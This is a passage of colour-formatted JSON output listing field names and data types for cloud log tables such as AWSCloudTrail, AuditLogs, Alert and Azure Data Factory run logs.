\u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceManager\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TransactionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesSystemSecurity\"\u001b[39;49;00m: {\n        \u001b[94m\"AuditsDiscarded\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFActivityRun\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityIterationCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityRunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EffectiveIntegrationRuntime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"End\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Error\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Input\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Output\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineRunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFPipelineRun\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"End\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Predecessors\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SystemParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFTriggerRun\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SystemParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerEvent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerFailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AWSCloudTrail\"\u001b[39;49;00m: {\n        \u001b[94m\"APIVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AWSRegion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalEventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AwsEventId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AwsRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementEvent\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReadOnly\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"RecipientAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resources\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResponseElements\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceEventDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionCreationDate\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerArn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerPrincipalId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionMfaAuthenticated\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SharedEventId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityAccessKeyId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityArn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityInvokedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityPrincipalid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VpcEndpointId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Alert\"\u001b[39;49;00m: {\n        \u001b[94m\"AlertContext\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertError\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertPriority\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertRuleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertRuleInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertStatus\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AlertTypeDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertTypeNumber\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AlertValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Comments\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom10\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom7\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom8\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom9\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Expression\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Flags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FlagsDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastModifiedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkToSearchResults\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PriorityNumber\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Query\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryExecutionEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"QueryExecutionStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationJobId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationRunbookName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RepeatCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ResolvedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RootObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskConnectionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskWorkItemLink\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskWorkItemType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFullName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StateType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StatusDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThresholdOperator\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThresholdValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TicketId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeLastModified\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeRaised\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeResolved\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ValueDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ValueFlags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ValueFlagsDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AppCenterError\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorFile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorLine\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JailBreak\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"LastErrorAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Model\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Oem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OsVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SchemaType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SymbolicatedAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserString\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AuditLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AADOperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AADTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalDetails\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Id\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InitiatedBy\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoggedByService\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResources\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AutoscaleEvaluationsLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AutoscaleMetricName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AvailabilitySet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        